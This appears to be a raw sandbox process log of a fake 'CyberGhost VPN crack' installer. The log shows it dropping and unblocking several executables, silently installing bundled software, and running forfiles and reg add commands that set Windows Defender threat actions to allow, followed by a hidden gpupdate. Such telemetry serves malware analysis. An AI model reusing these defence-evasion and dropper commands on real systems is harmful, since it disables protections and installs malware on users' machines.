"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5264 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6384 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\" -spe -an -ai#7zMap3561:124:7zEvent11950
C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe
"C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe"
C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp
"C:\Users\Admin\AppData\Local\Temp\is-43TA7.tmp\CyberGhost-VPN-Crack_Y8CdmvPVjs.tmp" /SL5="$5030E,5745945,56832,C:\Users\Admin\Downloads\CyberGhost-VPN-Crack_Y8CdmvPVjs\CyberGhost-VPN-Crack_Y8CdmvPVjs.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Passion_6102"
C:\Users\Admin\AppData\Local\Passion\passion32.exe
"C:\Users\Admin\AppData\Local\Passion\passion32.exe" cf34ff7a0074950a252e1460aab4eb7e
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 892
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1100
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1152
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1008
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1512
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1712
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1912
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://totrakto.com/CyberGhost-VPN-7.2.4294-Crack-Full-Torrent-Premium-2019-Free!.zip
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffad0c346f8,0x7ffad0c34708,0x7ffad0c34718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1616
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2624 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1956
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1988
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1644
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1552
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2040
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2064
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2232
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2240
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2236
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2240
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2388 -ip 2388
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe"
C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe
C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2388 -ip 2388
C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp" /SL5="$180390,3944022,54272,C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2328
C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe
"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe" -i
C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe
"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388
C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe
C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe /sid=3 /pid=146
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2356
C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe
C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe --silent --allusers=0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2224
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --silent --allusers=0 --server-tracking-blob=NDFlNTE4MjE5YjhlMzYzMWYwNmRjMTU5ZmJiZDgwZWM3MGQ1ZmY1YTc0ZDA1ODM0ZjNiZTU4MzMyODFhMmRiYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MTgwNjA5ODAuNDczMiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiOTA3ZmRmYTQtNDZjZi00ZWFkLWI5NjAtOWIyNWU1YzNjMzcwIn0=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.64 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x724ef308,0x724ef314,0x724ef320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2356
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3612 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240610230947" --session-guid=20cd9283-7421-4fe2-9146-ccbfa1e040ed --server-tracking-blob=ZDIxODE5YWJkZWI1MTI0Yzc5OWI5NGI1YTY2NWE0NzQxMTZiNTE0MjU3ODNiODUyNzEwNjI2OTI0ZWM2MGE5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxODA2MDk4MC40NzMyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI5MDdmZGZhNC00NmNmLTRlYWQtYjk2MC05YjI1ZTVjM2MzNzAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0806000000000000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.64 --initial-client-data=0x334,0x338,0x33c,0x304,0x340,0x7195f308,0x7195f314,0x7195f320
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2364
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1980
C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe
C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2304
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2388 -ip 2388
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2388 -ip 2388
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2388 -ip 2388
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1884
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1692
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388
C:\Windows\SysWOW64\WerFault.exe
